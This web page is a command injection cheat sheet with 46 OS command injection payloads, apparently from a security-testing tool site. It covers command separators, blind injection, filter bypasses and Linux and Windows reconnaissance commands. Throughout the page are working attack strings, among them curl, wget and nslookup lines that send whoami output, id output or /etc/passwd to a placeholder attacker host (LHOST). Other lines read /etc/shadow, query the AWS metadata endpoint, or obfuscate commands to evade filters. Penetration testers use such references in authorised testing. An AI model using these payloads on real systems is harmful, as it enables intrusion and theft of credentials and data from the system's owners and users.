Command Injection Cheat Sheet

OS command injection payloads for testing command separators, blind injection, and filter bypasses. (46 payloads)

Command Separators

(9)

; id

Semicolon separatorLinux

| id

Pipe — output of left discardedBoth

|| id

OR — runs if first failsBoth

& id

Background — runs bothBoth

&& id

AND — runs if first succeedsBoth

$(id)

Command substitutionLinux

`id`

Backtick substitutionLinux

%0aid

Newline URL-encodedBoth

\nid

Newline literalLinux

Blind Injection (No Output)

(9)

; sleep 5

Time-based detectionLinux

& timeout /T 5

Time-based detectionWindows

; ping -c 5 LHOST

ICMP callback (5 packets)Linux

& ping -n 5 LHOST

ICMP callback (5 packets)Windows

; curl http://LHOST/$(whoami)

HTTP callback with data exfilLinux

; wget http://LHOST/$(id|base64)

HTTP exfil base64 encodedLinux

; nslookup $(whoami).LHOST

DNS exfiltrationLinux

& nslookup %USERNAME%.LHOST

DNS exfiltrationWindows

| curl http://LHOST -d @/etc/passwd

POST file contents via curlLinux

Filter Bypass

(12)

c'a't /etc/passwd

Quote insertion bypass

c\at /etc/passwd

Backslash insertion bypass

ca$@t /etc/passwd

Empty variable bypass

/bin/c?t /etc/passwd

Wildcard character bypass

/???/??t /???/??????

Full wildcard bypass for cat /etc/passwd

cat${IFS}/etc/passwd

$IFS as space substitute

cat$IFS/etc/passwd

$IFS without braces

{cat,/etc/passwd}

Brace expansion bypass

X=$'cat\x20/etc/passwd'&&$X

Hex-encoded space in variable

echo${IFS}$(cat${IFS}/etc/passwd)

Chained $IFS bypass

w\h\o\a\m\i

Backslash in every character

$(printf '\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64')

Printf hex-encoded command

Linux-Specific

(7)

; cat /etc/passwd

Read passwd file

; cat /etc/shadow

Read shadow file (requires root)

; ls -la /

List root directory

; uname -a

System information

; env

Environment variables

; find / -perm -4000 2>/dev/null

Find SUID binaries

; curl http://169.254.169.254/latest/meta-data/

AWS metadata (SSRF chain)

Windows-Specific

(9)

& whoami

Current user

& ipconfig

Network configuration

& type C:\Windows\System32\drivers\etc\hosts

Read hosts file

& net user

List users

& net localgroup administrators

List admin group members

& systeminfo

System information

& tasklist

Running processes

& dir C:\Users

List user directories

& powershell -c "Get-Process"

PowerShell process list

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

Command Injection WAF Bypass

Related Cheat Sheets

Reverse Shell Cheat Sheet LFI / Path Traversal Cheat Sheet

$loading...